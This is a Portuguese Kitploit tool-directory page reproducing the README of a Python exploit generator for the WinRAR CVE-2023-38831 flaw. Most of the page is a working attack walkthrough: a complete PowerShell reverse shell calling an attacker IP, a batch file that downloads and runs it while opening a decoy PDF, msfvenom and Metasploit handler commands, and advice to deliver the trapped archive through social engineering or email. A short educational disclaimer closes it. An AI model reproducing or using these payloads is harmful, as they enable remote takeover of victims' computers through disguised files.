Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2023-38831-Exploit — Este projeto contém um script Python que explora **CVE-2023-38831**, uma vulnerabilidade nas versões do **WinRAR** anteriores à 6.23. O exploit gera um **arquivo RAR malicioso** que aciona a execução de código arbitrário quando a vítima abre um arquivo de aparência benigna dentro do arquivo (como um PDF). | Kitploit
Ferramentas/GitHubGitHub/technicalcorp0/cve-2023-38831-exploit
Geração de PayloadsExploraçãoExploração de Aplicações WebTestes de PenetraçãoEngenharia SocialAprendizado e EducaçãoRed Teaming
GitHubtechnicalcorp0/cve-2023-38831-exploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →

CVE-2023-38831-Exploit

Ver Repositório
14há 1 anoAinda não revisado

Sobre

Este projeto contém um script Python que explora **CVE-2023-38831**, uma vulnerabilidade nas versões do **WinRAR** anteriores à 6.23. O exploit gera um **arquivo RAR malicioso** que aciona a execução de código arbitrário quando a vítima abre um arquivo de aparência benigna dentro do arquivo (como um PDF).

Compartilhar

Gerador de Exploit CVE-2023-38831 para WinRAR

Criado por: technical_corp

Este projeto contém um script Python que explora a CVE-2023-38831, uma vulnerabilidade em WinRAR em versões anteriores à 6.23. O exploit gera um arquivo RAR malicioso que aciona a execução de código arbitrário quando a vítima abre um arquivo de aparência benigna dentro do arquivo (como um PDF). A vulnerabilidade foi explorada ativamente no mundo real de abril a agosto de 2023.

Visão Geral da Vulnerabilidade

CVE-2023-38831 é uma vulnerabilidade no WinRAR que permite aos atacantes executar código arbitrário quando a vítima abre um arquivo contendo tanto um arquivo benigno quanto uma pasta maliciosa com o mesmo nome. Quando o usuário interage com o arquivo benigno, o WinRAR processa erroneamente o conteúdo da pasta maliciosa e executa o payload do atacante.

Funcionalidades do Exploit

  • Gera um arquivo RAR malicioso que contém um arquivo isca (ex.: um PDF) e um payload (ex.: um arquivo .bat ou ).
.exe
  • O arquivo isca pode ser qualquer arquivo especificado pelo usuário (como um PDF ou documento).
  • O payload pode ser qualquer executável ou script (como um reverse shell criado com msfvenom).
  • Quando a vítima abre o arquivo isca, o payload é executado silenciosamente em segundo plano.
  • Pré-requisitos

    • Python 3.x
    • WinRAR versão anterior à 6.23 instalado na máquina da vítima (esta é a versão vulnerável).
    • Baixe WinRAR 6.22 daqui
    • Metasploit Framework (opcional, para gerar payloads).

    Como Usar

    Clone este repositório:

    root@kitploit:~
    git clone https://github.com/technical_corp/CVE-2023-38831-Exploit.git
    cd CVE-2023-38831-Exploit
    

    Vamos usar um arquivo batch embutido em um arquivo .rar para baixar e executar um PowerShell reverse shell hospedado.

    Passos:

    Crie o Script PowerShell Reverse Shell:

    Salve o seguinte script PowerShell como reverse.ps1 na sua máquina Kali Linux:

    root@kitploit:~
    $client = New-Object System.Net.Sockets.TCPClient('<attacker_ip>',<attacker_port>);
    $stream = $client.GetStream();
    [byte[]]$buffer = 0..65535|%{0};
    while(($i = $stream.Read($buffer, 0, $buffer.Length)) -ne 0){
        $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($buffer,0, $i);
        $sendback = (iex $data 2>&1 | Out-String );
        $sendback2  = $sendback + 'PS ' + (pwd).Path + '> ';
        $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
        $stream.Write($sendbyte,0,$sendbyte.Length);
        $stream.Flush()};
    $client.Close()
    

    Substitua <attacker_ip> pelo IP da sua máquina Kali Linux.

    Substitua <attacker_port> pelo número da porta em que você irá escutar.

    Hospede o Script PowerShell na Sua Máquina Kali Linux:

    Navegue até a pasta onde o script PowerShell está salvo:

    root@kitploit:~
    cd /path/to/powershell-script
    

    Use o servidor HTTP do Python para hospedar o arquivo na porta 80:

    root@kitploit:~
    python3 -m http.server 80
    

    Isso tornará o reverse.ps1 disponível em http://<attacker_ip>/reverse.ps1.

    Crie um Arquivo Batch para Baixar e Executar o Script PowerShell:

    Crie um arquivo batch (script.bat) que fará o download e executará o PowerShell reverse shell:

    root@kitploit:~
    @echo off
    :: Open the legitimate PDF
    start bait.pdf
    
    :: Download and execute the PowerShell script
    powershell -Command "Invoke-WebRequest -Uri 'http://<attacker_ip>/reverse.ps1' -OutFile 'C:\Users\Public\reverse.ps1'; Start-Process powershell -ArgumentList '-ExecutionPolicy Bypass -File C:\Users\Public\reverse.ps1' -NoNewWindow"
    exit
    

    Use o Script de Exploit CVE-2023-38831 para Embutir o Arquivo Batch:

    Execute o script de exploit do WinRAR para embutir o arquivo batch em um PDF legítimo:

    root@kitploit:~
    python3 CVE-2023-38831-WinRar-Exploit.py -b legitimate.pdf -p script.bat -o POC.rar
    

    Este comando cria o arquivo POC.rar, que contém o script.bat que executará o reverse shell.

    Configure um Listener Netcat no Kali Linux:

    Inicie um listener Netcat para capturar o reverse shell:

    root@kitploit:~
    nc -lvnp <attacker_port>
    

    Entregue o Exploit (POC.rar) à Vítima:

    Quando a vítima abrir o POC.rar e executar o arquivo PDF, o script.bat será acionado. O script baixará e executará o PowerShell reverse shell do seu servidor. Você receberá uma conexão reverse shell no seu listener Netcat.

    Usando um Executável Sem Execução Imediata:

    Gere um payload (se estiver usando Metasploit): Você pode criar um payload reverse shell usando msfvenom:

    root@kitploit:~
    msfvenom -p windows/meterpreter/reverse_tcp LHOST=<attacker_IP> LPORT=<attacker_port> -f exe > payload.exe
    

    Mova o arquivo payload.exe criado para o diretório CVE-2023-WinRAR-Exploit

    Execute o gerador de exploit: Execute o script Python para gerar um arquivo RAR malicioso:

    root@kitploit:~
    python cve-2023-38831-exploiter.py -b nmapcheatsheet.pdf -p payload.exe -o POC.rar
    

    -b: Especifique o arquivo isca (ex.: nmapcheatsheet.pdf). -p: Especifique o arquivo de payload (ex.: script.bat ou payload.exe). -o: Especifique o nome do arquivo de saída (ex.: POC.rar).

    Entregue o arquivo RAR à vítima: O malicious_archive.rar gerado pode ser entregue à vítima por engenharia social, anexos de e-mail ou plataformas de compartilhamento de arquivos.

    Configure um listener (se estiver usando Metasploit): Na sua máquina atacante, configure um listener para capturar o reverse shell:

    root@kitploit:~
    msfconsole
    use exploit/multi/handler
    set payload windows/meterpreter/reverse_tcp
    set LHOST <attacker_IP>
    set LPORT <attacker_port>
    exploit
    

    Fluxo do Exploit

    O atacante entrega um arquivo RAR malicioso à vítima. A vítima abre o arquivo isca (ex.: nmapcheatsheet.pdf), que aciona silenciosamente o payload. O payload (ex.: um reverse shell) é executado em segundo plano, dando ao atacante controle sobre o sistema da vítima.

    Aviso Legal

    Este projeto destina-se apenas a fins educacionais. O autor não se responsabiliza por qualquer uso indevido deste exploit. Ele só deve ser usado em ambientes autorizados ou em cenários de teste de penetração com consentimento total.

    Baixar ferramenta